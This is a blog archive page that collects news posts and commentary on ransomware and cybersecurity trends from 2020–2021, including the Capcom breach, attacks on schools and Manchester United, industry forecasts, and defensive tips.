Category Archives: ransomware

Ransomware provides the perfect cover

Look at any list of security challenges that CISOs are most concerned about and you’ll consistently find ransomware on them. It’s no wonder: ransomware attacks cripple organizations due to the costs of downtime, recovery, regulatory penalties, and lost revenue. Unfortunately, cybercriminals have added an extra sting to these attacks: they are using ransomware as a smokescreen to divert security teams from other clandestine activities behind the scenes. Attackers are using the noise of ransomware to … More

The post Ransomware provides the perfect cover appeared first on Help Net Security.

Most CISOs believe that human error is the biggest risk for their organization

53% of CISOs and CSOs in the UK&I reported that their organization suffered at least one significant cyberattack in 2020, with 14% experiencing multiple attacks, a Proofpoint survey reveals. This trend is not set to slow down, with 64% expressing concern that their organization is at risk of an attack in 2021. Those in larger organizations feel at greater threat, with this figure jumping to 89% amongst CSOs and CISOs from organizations over 2,500 employees … More

The post Most CISOs believe that human error is the biggest risk for their organization appeared first on Help Net Security.

Ransomware and DDoS is on the Rise: Tips for Distance Learning in 2021

The holidays have come and gone, and students returned to the virtual classroom. But according to the FBI, cyberattacks are likely to disrupt online learning in the new year. As of December 2020, the FBI, Cybersecurity and Infrastructure Security Agency (CISA), and MS-ISAC continue to receive reports from K-12 educational institutions about the disruptions caused by cyberthreats, primarily ransomware and Distributed Denial of Service (DDoS). To protect their education and digital lives, distance learners will need to stay vigilant when it comes to ransomware and DDoS attacks. Let’s dive into the impact these threats have on the K-12 education system now that more people are plugged in as a result of distance learning.

Hackers Hold Education for Ransom

Of all the attacks plaguing K-12 schools this year, ransomware has been a particularly aggressive threat. Ransomware attacks typically block access to a computer system or files until the victim pays a certain amount of money, or “ransom.” The FBI and CISA issued a warning that showed a nearly 30% increase in ransomware attacks against schools. In August and September, 57% of ransomware incidents involved K-12 schools, compared to 28% of all reported ransomware incidents from January through July. And it’s unlikely that hackers will let up anytime soon. Baltimore County’s school system was recently shut down by a ransomware attack that hit all of its network systems and closed schools for several days for about 111,000 students. It wasn’t until last week that school officials could finally regain access to files they feared were lost forever, including student transcripts, first-quarter grades, and vital records for children in special education programs.

According to ZDNet, the five most active ransomware groups targeting K-12 schools are Ryuk, Maze, Nefilim, AKO, and Sodinokibi/REvil. Furthermore, all five of these ransomware families are known to run “leak sites,” where they dump data from victims who don’t pay the ransom. This creates the particularly dangerous problem of student data being published online. To prevent distance learning disruption, students and educators need to understand the effects of ransomware on school systems and take steps to prevent the damage caused by this threat.

DDoS Attacks Disrupt Distance Learning

An increase in ransomware attacks isn’t the only problem that K-12 schools are facing. CISA and the FBI warned those participating in distance learning to protect themselves against other forms of cyberattacks such as Distributed Denial of Service (DDoS). DDoS is a method where hackers flood a network with so much traffic that it cannot operate or communicate as it normally would.

According to Dark Reading, Miami-Dade County Public Schools experienced significant disruptions during their first three days of distance learning for the 2020-2021 school year, thanks to a series of DDoS attacks. The school system stated it had already experienced more than a dozen DDoS attacks since the start of the school year. Sandwich Public Schools in Massachusetts were also knocked offline by a DDoS attack. When school systems fall victim to DDoS attacks, students can lose access to essential documents, files, or online platforms that they need to complete assignments. And with many students relying heavily on distance learning systems, losing access could put them behind.

Delete Disruptions: Follow These Security Tips

In an effort to create a standardized framework for dealing with ransomware attacks across verticals – including education – McAfee has teamed up with Microsoft to lead the Ransomware Task Force, along with 17 other security firms, tech companies, and non-profits. And while we’re taking critical actions to decrease the threat of ransomware attacks, there are other steps you can take to prevent ransomware and DDoS attacks from interrupting your distance learning experience. Follow these tips to take charge of your education and live your digital life free from worry:

Don’t pay the ransom

Many ransom notes seem convincing, and many only request small, seemingly doable amounts of money. Nevertheless, you should never pay the ransom. Paying does not promise you’ll get your information back, and many victims often don’t. So, no matter how desperate you are for your files, hold off on paying up.

Do a complete backup

With ransomware attacks locking away crucial data, it’s important to back up your files on all your machines. If a device becomes infected with ransomware, there’s no promise you’ll get that data back. Ensure you cover all your bases and have your data stored on an external hard drive or in the cloud.

Use decryption tools

No More Ransom – an initiative that teams up security firms, including McAfee, and law enforcement – provides tools to free your data, each tailored for a specific type of ransomware. If your device gets held for ransom, start by researching what type of ransomware it is. Then, check out No More Ransom’s decryption tools and see if one is available for your specific strain.

Secure your router

Your Wi-Fi router is the gateway to your network. Secure it by changing the default password. If you aren’t sure how to do this, consult the internet for instructions on how to do it for your specific make and model, or call the manufacturer. Solutions like McAfee Secure Home Platform, which is embedded within select routers, can help you easily manage and protect your network from DDoS attacks and more.

Change default passwords on IoT devices

A lot of internet of things (IoT) devices come with default usernames and passwords. After taking your IoT device out of the box, the first thing you should do is change those default credentials. If you’re unsure of how to change the default setting on your IoT device, refer to setup instructions or do a bit of research online.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Ransomware and DDoS is on the Rise: Tips for Distance Learning in 2021 appeared first on McAfee Blogs.

Security is everyone’s priority

By Dana Mitchell, Director, Cybersecurity Solutions Group, Microsoft Canada

Digital transformation, cloud computing and a sophisticated threat landscape are forcing everyone to rethink the roles that each individual within an organization has in defending against cyber threats. With billions of people around the globe working from home, changes to the daily practice of cybersecurity are…

The post Security is everyone’s priority first appeared on IT World Canada.

Out today: Defending against critical threats: A 12 month roundup

Inside, we take a retrospective look at cyber threats and how they have evolved in the last 12 months. In something a little different from our previous reports, we’ve designed this in a magazine-style format that includes both interviews with security experts and research-driven features.

Our intention is to help inform strategic decision-making as organizations prepare for threats they may encounter in the future.

As a couple of callouts, we’ve included articles that address the ways cyber criminals sought to take advantage of the COVID-19 pandemic, be it through phishing campaigns, leveraging the great migration to remote work, or even going after health care organizations themselves.

Our interview with Esmond Kane, CISO for Steward Health Care, also shines a light on how COVID-19 impacted those on the security front line.

In other topics, we’ve seen a large evolution in ransomware over the past year. Edmund Brumaghin, threat researcher for Cisco Talos, has pulled together some terrific research on Big Game Hunting attacks. This is when cyber criminals seek to monopolize a ransomware deployment by targeting backup systems, domain controllers, and other business-critical servers during a “post-compromise” phase.

Our cover feature is the topic of election security. Cisco Talos spent four years conducting hands-on research into this field, and within this publication we have an interview with Matt Olney, Director of Talos threat intelligence and interdiction (who led this research), to capture his thoughts post-election.

As our team were pulling this magazine together, what really struck me was that the topics illustrate how cyber threats impact our lives on a human level: from threats against our democracy, to our healthcare, to the organizations we work within.

I hope you enjoy the read.

Click to read ‘Defending against critical threats: A 12 month roundup’

For more on these threat topics, take a listen to the latest episode of the Security Stories podcast.

Ben Nahorney (my co-editor for the magazine) and I are joined live by Edmund Brumaghin to learn more about big game hunting attacks. Plus, we have the full interview with Esmond Kane to hear more about his experiences leading security on the front line of healthcare.

Listen below, or on Apple Podcasts, Spotify, Google Podcasts, or wherever you normally get your podcasts from.

How to defend against today’s top 5 cyber threats

Cyber threats are constantly evolving. As recently as 2016, Trojan malware accounted for nearly 50% of all breaches. Today, they are responsible for less than seven percent. That’s not to say that Trojans are any less harmful. According to the 2020 Verizon Data Breach Investigations Report (DBIR), their backdoor and remote-control capabilities are still used by advanced threat actors to conduct sophisticated attacks. Staying ahead of evolving threats is a challenge that keeps many IT … More

The post How to defend against today’s top 5 cyber threats appeared first on Help Net Security.

CAPCOM: 390,000 People Impacted in the Recent Ransomware Attack

Capcom revealed that the recent ransomware attack has potentially impacted 390,000 people, an increase of approximately 40,000 people from the previous report.

In November, Japanese game developer Capcom admitted to having suffered a cyberattack that was impacting business operations.

The company has developed multiple multi-million-selling game franchises, including Street Fighter, Mega Man, Darkstalkers, Resident Evil, Devil May Cry, Onimusha, Dino Crisis, Dead Rising, Sengoku Basara, Ghosts ‘n Goblins, Monster Hunter, Breath of Fire, and Ace Attorney as well as games based on Disney animated properties.

At the time, the Notice Regarding Network Issues published by the company revealed that on the morning of November 2nd, 2020 it suffered a cyberattack. In response to the incident, the game developer shut down portions of its corporate network to prevent the malware from spreading.

The incident did not impact connections for its players, and the company initially declared that it had not found any evidence that customer data was stolen.

In mid-November, the company confirmed that the attackers accessed the personal information of its employees, along with financial and business information. The company believes that other information potentially accessed includes sales reports, financial information, game development documents, and other information related to business partners.

No credit card information was compromised in the security breach.

After the attack, the Ragnar Locker ransomware operators claimed to have stolen over 1TB of data from the company.

In an update published by the Ragnar Locker ransomware gang on its leak site, the operators leaked a collection of archives as proof of the hack.

“Greetings! Unfortunately even such worldwide leading company as CAPCOM doesn’t values much privacy and security. They was notified about vulnerability and data leak numerous time. They checked our page with proofs but even this didn’t help them to make a right decision and save data from leakage. Also we would help them to decrypt and also provide with recommendations on security measures improvement, to avoid such issues in future.” reads the post published by the Ragnar gang on its leak site.

“We are sure that everyone should know about CAPCOM’s decision and careless attitude regarding data privacy. This might seems crazy in 21st century, all corporates should work harder on their security measures, especially IT and online based companies.”

This week, Capcom provided an update on its investigation, which revealed that the number of impacted people is larger than initially believed.

Capcom revealed that the personal information of 16,415 people (cumulative since the investigation began) was stolen by the ransomware gang. Impacted people include 3,248 business partners, 9,164 former employees and related parties, and 3,994 employees and related parties; 16,406 of these are listed in the current update, the other 9 having been identified earlier in the investigation.

“Further, because the overall number of potentially compromised data cannot specifically be ascertained due to issues including some logs having been lost as a result of the attack, Capcom has listed the maximum number of items it has determined to potentially have been affected at the present time.” reads the update published by the company.

The cumulative maximum number of potentially impacted people is 390,000, an increase of approximately 40,000 people from the previous report.

1. Information verified to have been compromised (updated)

i. Personal Information: 16,406 people (*cumulative total since investigation began: 16,415 people)
   Business partners, etc.: 3,248 people
      At least one of the following: name, address, phone number, email address, etc.
   Former employees and related parties: 9,164 people
      At least one of the following: name, email address, HR information, etc.
   Employees and related parties: 3,994 people
      At least one of the following: name, email address, HR information, etc.
ii. Other Information: Sales reports, financial information, game development documents, other information related to business partners

2. Potentially compromised data (updated)

i. Personal Information
   Applicants: approx. 58,000 people
      At least one of the following: name, address, phone number, email address, etc.

*Cumulative maximum number of potentially compromised data for customers, business partners and other external parties: 390,000 people

*Regarding the cumulative maximum number of potentially compromised data above: as part of its ongoing investigation, Capcom has determined that it currently does not see evidence for the possibility of data compromise for the approximate 18,000 items of personal information from North America (Capcom Store member information and esports operations website members) that the company included in its November 16, 2020 announcement. As such, these have been removed from this cumulative maximum number of potentially compromised data.

The company pointed out that the investigation is still ongoing and that new facts may come to light.

“At this point in time, Capcom’s internal systems have in large part recovered, and business operations have returned to normal.” concludes the update.

Pierluigi Paganini

(SecurityAffairs – hacking, CAPCOM)

The post CAPCOM: 390,000 People Impacted in the Recent Ransomware Attack appeared first on Security Affairs.

Smashing Security podcast #210: DC rioters ID’d, Energydots, and ransomware gets you in a pickle

Penile penal problems, identifying rioters in Washington DC, and can a sticker protect you from radiation? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by The Cyberwire's Dave Bittner. And don't miss our featured interview with CrowdSec's Philippe Humeau.

Ransomware gangs scavenge for sensitive data by targeting top executives

In their attempt to extort as much money as quickly as possible out of companies, ransomware gangs know some effective techniques to get the full attention of a firm's management team. And one of them is to specifically target the sensitive information stored on the computers used by a company's top executives, in the hope of finding valuable data that can best pressure bosses into approving the payment of a sizeable ransom. Read more in my article on the Tripwire State of Security blog.

Ransomware Gangs Scavenge for Sensitive Data by Targeting Top Executives

In their attempt to extort as much money as quickly as possible out of companies, ransomware gangs know some effective techniques to get the full attention of a firm’s management team. And one of them is to specifically target the sensitive information stored on the computers used by a company’s top executives, in the hope […]… Read More

The post Ransomware Gangs Scavenge for Sensitive Data by Targeting Top Executives appeared first on The State of Security.

One month after ransomware attack, Metro Vancouver’s transit system still not up to speed

TransLink, Metro Vancouver’s public transportation agency, has warned its staff that hackers accessed their personal bank account details and other information. The warning came in an internal email to workers approximately one month after TransLink was struck by the Egregor ransomware and passengers had their journeys disrupted. Read more in my article on the Hot for Security blog.

Cyber Security Roundup for January 2021

A suspected nation-state, sophisticated cyber-attack on SolarWinds, which led to the distribution of a tainted version of the SolarWinds Orion network monitoring tool and compromised its customers, dominated the cyber headlines in mid-December 2020. This was not only one of the most significant cyberattacks of 2020 but perhaps of all time. The United States news media reported that the Pentagon, US intelligence agencies, nuclear labs, the Commerce, Justice, Treasury and Homeland Security departments, and several utilities were all compromised by the attack. For the full details of the SolarWinds cyber-attack see my article Sunburst: SolarWinds Orion Compromise Overview.

Two other cyberattacks possibly linked to the SolarWinds hack were also reported: the cyber-theft of sophisticated hacking tools from cybersecurity firm FireEye, for which a nation-state actor is suspected to be responsible, and an advisory from the United States National Security Agency (NSA) that a VMware security vulnerability was being exploited by Russian state-sponsored actors.

Amidst the steady stream of COVID-19 and Brexit news reports, yet another significant ransomware and cyber-extortion attack briefly made UK headlines. Hackers stole confidential records, including patient photos, from UK cosmetic surgery chain 'The Hospital Group', and threatened to publish patients' 'before and after' photos. The UK cosmetic surgery firm, which has a long history of celebrity endorsements, confirmed it was the victim of a ransomware attack, and that it had informed the UK's Information Commissioner's Office about the loss of personal data.

Spotify users had their passwords reset after security researchers alerted the music streaming platform to a leaky database which held the credentials of up to 350,000 Spotify users, and which could have been part of a credential stuffing campaign. Security researchers at Avast reported that 3 million devices may have been infected with malware hidden within 28 third-party Google Chrome and Microsoft Edge extensions.

A McAfee report said $1 Trillion was lost to cybercrime in 2020, and companies remained unprepared for cyberattacks in 2021.

Stay safe and secure.

Trends in IT-Security and IAM in 2021, the “New Normal” and beyond

Article by Dennis Okpara, Chief Security Architect & DPO at IDEE GmbH

Yes, there is hope for 2021, but the challenges of the “New Normal” are here to stay. CISOs have to prepare and start acting now, because cybersecurity and the IT infrastructure will have to face threats that have only just started.

The year 2020 was the year working from home lost its oddity status and became normality. Big names like Google and Twitter are planning long-term and hold out the prospect of working from home on a permanent basis. More than 60 percent of companies are trying the same and implemented home office policies in 2020. But with great flexibility comes great responsibility: everyone responsible for cybersecurity and a secure IT infrastructure is now dealing with new challenges in closing the last gaps and weak points when it comes to allowing access to company resources. Dennis Okpara, Chief Security Architect & DPO at IDEE GmbH, the specialist for secure identity access management (IAM), authentication and authorization, shows the top 3 issues CISOs have to look out for:

1. The Problem with Insider Threats will only get Worse
With more and more people working from home, the use of personal devices and working on private networks only increases and further fuels the risk of insider threats. This does not come as a surprise. As early as 2018, Verizon's Data Breach Investigations Report already recorded an increase in threats from "internal actors," meaning employees who knowingly or unknowingly illegally disseminated data and other company information. According to the 2020 report, insiders were responsible for a data breach in a flabbergasting 30% of cases.

The case of Twitter in the summer of 2020 vividly illustrates the damage an insider threat can create. Hackers used social engineering to exploit the insecurity of IT employees and thus gain access to internal systems. Of course, it is quite unlikely that any of Twitter’s employees acted with malicious intent; still, they became the tool for an attack. The result: although the account takeovers (ATOs) were used for fairly obvious scam posts, the attackers captured well over $100,000.

No company is immune to such attacks, and even strict cybersecurity policies have little effect because they are very difficult to enforce or monitor when people are working from home. Therefore, it can be assumed that the number of insider threats will increase by more than 20% in 2021.

2. Ransomware and Shadow-IT are bound to become the CISOs’ nightmare
Working from home came suddenly for most companies, pretty much overnight, and even now most corporations are not sufficiently prepared for the challenges that lie ahead. Unlike in the office, where the IT department can reasonably reliably control the distribution of software on employee PCs, the use of home networks and private devices opens up new attack vectors for hackers.

Employees often use third-party services, download free software, or use private cloud services as a workaround when corporate services are not available. The storage of documents, access to data or other sensitive information on private devices will also continue to increase without CISOs being able to control this. Since private devices and networks are usually inadequately protected, they serve as a gateway for ransomware, which then attacks corporate networks, encrypts data and extorts high ransoms. Gartner analysts had already predicted a 700% increase in 2017; the growth from the New Normal will dwarf those numbers and give CISOs many sleepless nights. Due to system and network vulnerabilities, misconfigurations, phishing, and the increase in credential attacks, we will likely see an exponential increase in ransomware attacks in 2021.

3. Mobile Devices Become a Favourite Target for Hackers
Developments such as multi-factor authentication (MFA) are improving the security of access to corporate services. On the flip side, this has put mobile devices in the crosshairs of hackers. As smartphones are now practical for almost all online activities, the number of attack vectors has grown steadily along with them. In addition to malware, which can be easily installed via third-party apps, especially on Android, and data manipulation or the exploitation of recovery vulnerabilities (such as the interception of magic links or PIN text messages), social engineering is a particularly popular field here.

In addition to the widespread phishing e-mail, vishing (manipulation of employees by fictitious calls from IT staff) and smishing (which works similarly to phishing but uses SMS instead of e-mail) will increase sharply. Hackers will come up with new tricks to compromise mobile devices, and that can only make digital fraud worse.

2021: The Year We Abolish Trust
In a year in which we will have to learn a lot of things anew, CISOs are well-advised not to build anything on trust – neither their network infrastructure nor their IAM. Zero-trust architectures that question all access to corporate resources must become the standard in the age of the New Normal. Restricting resource access to a physical address or IP address, or to VPN access, is counterproductive and difficult to manage if employees are to work from remote locations. Digital identity will shift from user identity to the combined identity of the device and the user. Only this will enable modern and secure identity & access management.

A Review of Ransomware in 2020

As if dealing with COVID-19 were not enough, 2020 turned out to be a banner year for another troublesome strain of virus – ransomware. Malicious actors grew more sophisticated, daring and brutal. They also hit a number of high-profile targets. For those of you who didn’t keep up with all of the developments in the ransomware […]… Read More

The post A Review of Ransomware in 2020 appeared first on The State of Security.

Six Trends Shaping the 2021 Cybersecurity Outlook

Article by Tom Kellermann, Head of Cybersecurity Strategy, Rick McElroy, Head of Security Strategy, and Greg Foss, Senior Cybersecurity Strategist, VMware Carbon Black

Everything is different, and yet the same. As we look ahead to the cybersecurity landscape in the next 12 months, it is from a position no one predicted this time last year. Business operations have changed beyond recognition, with most employees working from home in a transition that happened almost overnight. Stretched security teams have been challenged to rapidly deploy robust remote working facilities to maintain productivity. Most were writing the ‘pandemic playbook’ as they went along.

Ironically, one of the few certainties of the situation was that cybercriminals would take advantage of disruption to escalate campaigns. In that sense, nothing changed, except that the opportunity was suddenly much greater. As a result, nine in ten security professionals surveyed by our Threat Analysis Unit said they were facing increased attack volumes, which they attributed to the newly distributed working environment.

The effects of COVID-19 will continue to impact the cybersecurity sector for some time, but they are not the only considerations. This year we’ve seen cybercrime and cybercriminal groups continue along a path of technical and industry innovation that will see new strategies and tactics gain traction in 2021. We have also seen cyber defences tested like never before and, for the most part, they have held firm; there is reason for cybersecurity professionals to be optimistic.

With this in mind, the following are six trends we expect to see, and key areas cybersecurity professionals should keep their eyes on in 2021.

1. Remote-Working Focuses Attacker Attention on Mobile Compromise
As business becomes more mobile than ever and remote working persists, mobile devices and operating systems will be increasingly targeted. As employees use personal devices to review and share sensitive corporate information, these become an excellent point of ingress for attackers. If hackers can get into your Android or iPhone, they will then be able to island-hop into the corporate networks you access, whether by deactivating VPNs or breaking down firewalls.

We will also see hackers using malware such as Shlayer to access iOS, ultimately turning Siri into their personal listening device to eavesdrop on sensitive business communications.

Combating these risks requires a combination of new mobile device policies and infrastructure designed to facilitate continued remote working, as well as raising employee awareness of the persistent risks and the importance of digital distancing.

2. Continuing Direct Impacts on Healthcare
In terms of the direct impact of COVID-19, the healthcare sector, at the heart of crisis response, will see the adaptations it made to try and maintain patient services become a vulnerability. With growing reliance on telemedicine for routine medical appointments, lucrative personally identifiable information (PII) is being accessed from remote locations and as a result is more easily intercepted by hackers. At the same time, vaccine-related data pertaining to trials and formulae is some of the most sought-after intellectual property right now, and the drive to get hold of it for financial or political gain is putting healthcare and biotech organisations under intense pressure from external threats and insider risk.

That said, the strain on healthcare cybersecurity is not going unheeded; we will see increased IT and security budgets in the sector to combat the growth in external threats.

3. Emerging Tactical Trends: Cloud-Jacking and Destructive ICS Attacks
As the new year dawns, we will see tried and tested tactics evolving to become more sophisticated and take advantage of changes in network architecture. Cloud-jacking through public clouds will become the island-hopping strategy of choice for cybercriminals as opportunity proliferates due to the overreliance on public clouds by the newly distributed workforce.

It won’t be only the virtual environment under threat. Increasing cyber-physical integration will tempt nation state-sponsored groups into bolder, more destructive attacks against industrial control system (ICS) environments. Critical National Infrastructure, energy and manufacturing companies will be in the crosshairs as OT threats ramp up. Our analysts are seeing new ICS-specific malware changing hands on the dark web and we are likely to see it in action in the coming year.

4. The Ransomware Economy Pivots to Extortion and Collaboration
Another familiar tactic taking on a new twist is ransomware. Ransomware groups have evolved their approach to neutralise the defensive effect of back-ups and disaster recovery by making sure they’ve exfiltrated all the data they need before the victim knows they’re under attack. Once the systems are locked, attackers use the data in their possession to extort victims to pay to prevent the breach becoming public. And if that fails, they can sell the data anyway, meaning the victim is doubly damaged.

Ransomware is such big business that the leading groups are collaborating, sharing resources and infrastructure to develop more sophisticated and lucrative campaigns. Not all collaborations will be successful, however, and we’ll see groups disagreeing on the ethics of targeting vulnerable sectors such as healthcare.

    5. AI Utilised for Defensive and Offensive Purposes
    Technology innovation is as relevant to attackers as it is to defenders and, while artificial intelligence and machine learning have significant benefits in cybersecurity, we can expect to see adversaries continue to advance in the way AI/ML principles are used for post-exploitation activities. They’ll leverage collected information to pivot to other systems, move laterally and spread efficiently – all through automation.

    The silver lining is that in 2021 defenders will begin to see significant AI/ML advancements and integrations into the security stack. Security automation will be simplified and integrated into the arsenal of more organisations – not just those with mature SOCs. As awareness of how attackers are using automation increases, we can expect defenders to fix the issue, maximising automation to spot malicious activity faster than ever before.

    6. Defender Confidence is Justifiably on the Rise
    To finish on a resoundingly positive note, this year we saw cyber defences placed under inconceivable strain and they flexed in response. Yes, there were vulnerabilities due to the rapidity of the switch to fully remote working, but on the whole security tools and processes are working. Defender technology is doing the job it is designed to do, and that is no small feat.

    The mission-critical nature of cybersecurity has never been more apparent than in 2020 as teams have risen to the challenge of uniquely difficult circumstances. In recognition of this we will see board-level support and a much healthier relationship between IT and security teams as they collaborate to simultaneously empower and safeguard users. 2020 has been the catalyst for change for which we were more than ready.

    Cyber Security Roundup for December 2020

    A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, November 2020.

    Manchester United FC remains impacted by a seemingly major cyber-attack, which I covered in a blog post titled The Multi-Million Pound Manchester United Hack. At this point, United have provided few details about their cyber-attack, which has been impacting the club's IT systems for well over a week. However, the UK media are widely reporting that United's leaky IT defences were unable to prevent a ransomware attack and data theft. London's Hackney Borough Council have also been tight-lipped about what they describe as "a serious cyber-attack" which has impacted its service delivery to Londoners. Like United, this attack has all the hallmarks of a mass ransomware outbreak. Both Manchester United and Hackney Council said they are working with the UK's National Cyber Security Centre (NCSC).

    Man.Utd hit by ransomware, who's next?

    Street Fighter games maker Capcom was also reported to have been compromised by a ransomware attack, with up to 350,000 people said to be affected, along with some of Capcom's financial information stolen. The Ragnar Locker hacker group were said to be behind the attack, although indications are that Capcom hasn't given in to their ransom demands, after an ominous message appeared on the Ragnar group's website saying Capcom didn't "make a right decision and save data from leakage".

    Ransomware attacks will go from bad to worse in 2021, according to Sophos. In its annual threat report, Sophos anticipates ransomware tactics, techniques and procedures becoming more evasive, with criminal threat actors operating more like nation-state attackers. Sophos also expects an increase in the number of entry-level, apprentice-type attackers looking for menu-driven ransomware-for-rent, meaning the technical barrier preventing general nefarious folk from orchestrating ransomware attacks is getting lower.

    It's likely COVID-19 has saved Ticketmaster from a more substantial DPA/GDPR fine, after the Information Commissioner's Office (ICO) announced it had fined the gig ticket selling company a mere £1.25 million for failing to keep 9 million of its customers' personal data and payment cards secure. The ICO investigation concluded a vulnerability in a third-party chatbot installed on Ticketmaster's online payments page was exploited and used to access its customers' card payment details. Following the breach, 60,000 Barclays bank customers were victims of fraud, while online bank Monzo had to replace 6,000 payment cards due to fraud. Ticketmaster said it would appeal against the ICO ruling.

    An interesting new UK law is in the offing, which proposes fines of 10% of turnover or more than £100,000 a day for telecoms operators that use Huawei network equipment within their 5G networks. The bill gives the UK government new powers to force the UK telecoms giants to stop using Huawei equipment; the threatened sum of £100,000 a day would only be used in the case of "continuing contravention", according to Number 10.

    Consumer group Which? warned that security flaws in popular smart doorbells are placing UK consumers at risk. The watchdog tested 11 smart doorbell (IoT) devices purchased from popular online marketplaces like Amazon; the dodgy products were said to have been made by Qihoo, Ctronics and Victure. The most common security flaws found by Which? were weak password policies and a lack of data encryption. Two of the devices could be manipulated to steal network WiFi passwords, giving an attacker the opportunity to then hack other smart devices within the home.

    The NCSC released its annual review, confirming what we already know about the commonality of ransomware attacks on UK organisations. The NCSC also accused Russia of trying to steal vaccine-related information through cyber-espionage, warning of an "ongoing threat" of nation-states targeting the UK vaccine research-and-delivery programmes. The NCSC were not alone in pointing the finger at nation-state threat actors going after COVID-19 vaccines; Microsoft also reported that state-backed hackers from Russia and North Korea were targeting organisations working on a coronavirus vaccine. The Russian group "Fancy Bear" and the North Korean groups "Zinc" and "Cerium" were fingered by Microsoft as the culprits behind a spate of recent cyber-attacks. Microsoft said Fancy Bear were brute-forcing accounts with millions of different password combinations, while the North Korean groups sent spear-phishing emails posing as World Health Organisation officials, in an attempt to trick researchers into handing over their login credentials and research data.

    Stay safe and secure.


      The Multi-Million Pound Manchester United Hack

      Earlier this year I wrote a blog post about the Manchester City Billion Pound Hack, which explored cyberattacks within elite football. Now it is the turn of City's big rivals Manchester United, after they reported their IT systems had been impacted by a cyber-attack, widely reported in the UK media as a cyber-extortion attack.

      In the last couple of years, cybercriminals have significantly ramped up their efforts in targeting UK businesses with cyber extortion attacks, using ransomware malware and confidential data theft to leverage their victims into anonymously paying large ransoms in Bitcoin. Many businesses have been quick to pay out ransoms after their operations ground to a halt due to their IT systems being rendered unusable by ransomware, and also to stop the cybercriminals from dumping their confidential data on the internet.

      In July 2020 the UK National Cyber Security Centre (NCSC) specifically warned in a report that cybercriminals were targeting UK sports teams with ransomware attacks. This NCSC report cited a ransomware attack against an unnamed English Football League club, which crippled their IT systems to the extent that it stopped their turnstiles from working and almost led to the cancellation of a league fixture, which would have cost the club hundreds of thousands of pounds in lost income. The NCSC reported it suspected the cyber attackers gained access to the football club's network either via a phishing email or via a remote access system connected to the club's CCTV system. That access was used to spread ransomware across the entire football club IT network. It is understood the cybercriminals behind the attack demanded 400 bitcoin (over £300,000), which was not paid. It seems Manchester United have been targeted similarly.

      In a statement on 20th November 2020, Manchester United stated, 

      'Manchester United can confirm that the club has experienced a cyber attack on its systems. The club has taken swift actions to contain the attack and is currently working with expert advisers to investigate the incident and minimize the ongoing IT disruption.

      Although this is a sophisticated operation by organized cyber criminals, the club has extensive protocols and procedures in place for such an event and had rehearsed for this risk. Our cyber defenses identified the attack and shut down affected systems to contain the damage and protect data.'

      Despite the assurances in the statement, the cyber-attack does not appear to have been contained and recovered from as yet, as both the Daily Mirror and the Daily Mail reported on 28th and 29th November 2020 respectively that hackers had accessed the club's scouting system's 'confidential information on targets and scouting missions'. Several UK newspapers also reported the club's email system remains disabled.

      As yet, no details have been released about the cyberattack's ingress method, the malware used or the suspected perpetrators behind the attack. When asked for details, Man Utd stated 'The club will not be commenting on speculation regarding who may have been responsible for this attack or the motives behind it.' Without any details of the cyberattack being released by the club or leaked, at this stage it's difficult to draw any conclusions, but we can speculate.

      The likely suspect is a variant of the Ryuk ransomware, possibly orchestrated by the Ryuk criminal group, together with the recently reported resurgence of the Emotet trojan last month; Emotet is a common dropper of ransomware. It was a new variant of the Ryuk ransomware that was behind a cyberattack on digital services firm Sopra Steria in October 2020. Another common ransomware culprit is Trickbot; however, Microsoft and their partners took action last month to disrupt the Trickbot botnet.

      No details have been released on how much this incident is costing Manchester United, nor on the ransom fee being demanded. The media have speculated the ransom fee to be in the millions, likely based on that recent NCSC report, which stated an EFL club faced a £5 million ransom from cyber attackers.

      If this attack is found to have breached Manchester United fans' data protection rights under the UK Data Protection Act (GDPR), the club could face a fine of up to £18m or 2% of their total annual worldwide turnover from the UK Information Commissioner's Office. Further, given Manchester United are listed on the New York Stock Exchange, the club could face additional penalties under US legislation if they decide to pay the ransomware fee; that fine could be up to £15m ($20m).

      The US Office of Foreign Assets Control (OFAC) warned that paying the ransom demand would only boost the criminals’ finances and encourage them to strike again elsewhere, stating, 

      ‘Facilitating a ransomware payment that is demanded as a result of malicious cyber activities may enable criminals and adversaries with a sanctions nexus to profit and advance their illicit aims.

      Ransomware payments may also embolden cyber actors to engage in future attacks.’

      The last sentence of the OFAC statement is an essential point: given that many organisations are giving in to cyber-extortion demands and paying up, it is fuelling further attacks.

      If it were made illegal in the UK to pay a cyber extortion payment, that law would not only remove the temptation of giving up on recovery and paying ransoms, but also push UK organisations into investing in and deploying the appropriate level of cybersecurity controls to counter the risk, as there are simple security controls which can adequately thwart the risk of successful ransomware and data theft attacks. The simple truth is that most ransomware and data theft attacks aren't really 'sophisticated'; successful attacks can be prevented by applying security control basics, such as continually patching IT systems (especially internet-facing remote access VPN appliances), deploying and keeping anti-virus up to date, blocking suspicious external emails, and ensuring staff have a good level of security awareness, particularly in their ability to spot phishing emails.

      Without shifting the 'Reward vs Effort' reasoning of global criminal threat actors, we can expect to see further high-profile businesses like Manchester United targeted with cyber extortion attacks, which ultimately cause significant reputational and financial damage to their organisations.

      Cyber Security Roundup for November 2020

      A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, October 2020.

      London's Hackney Borough Council has been tight-lipped about "a serious cyber-attack" which took down its IT systems, impacting its service delivery to citizens. The council has provided scant information about the attack, but it has all the hallmarks of a ransomware outbreak. The council says it is working with the UK's National Cyber Security Centre (NCSC) and the Ministry of Housing to investigate and understand the impact of the incident. Ransomware attacks continue to be a major blight on UK public services, with everything from councils to hospitals struggling to defend their IT systems against ransomware. Earlier this year Redcar and Cleveland Borough Council said it had been hit by a ransomware attack, which cost it more than £10m.

      It looks like ransomware will continue to pose a major threat to the UK for some time to come, with separate reports advising of a resurgence in the Emotet trojan, a common dropper of ransomware, while the hacking group behind the notorious Ryuk ransomware has been reported as being active again. A new variant of the Ryuk ransomware was behind a cyberattack on Sopra Steria’s operations in October 2020, the digital services company confirmed.

      British Airways had its credit card breach DPA fine cut by a massive £163m to £20m by the UK Information Commissioner's Office (ICO), which imposed the original fine after the now pandemic-beleaguered airline lost 430,000 payment card details to hackers in an e-commerce skimming attack in 2018.

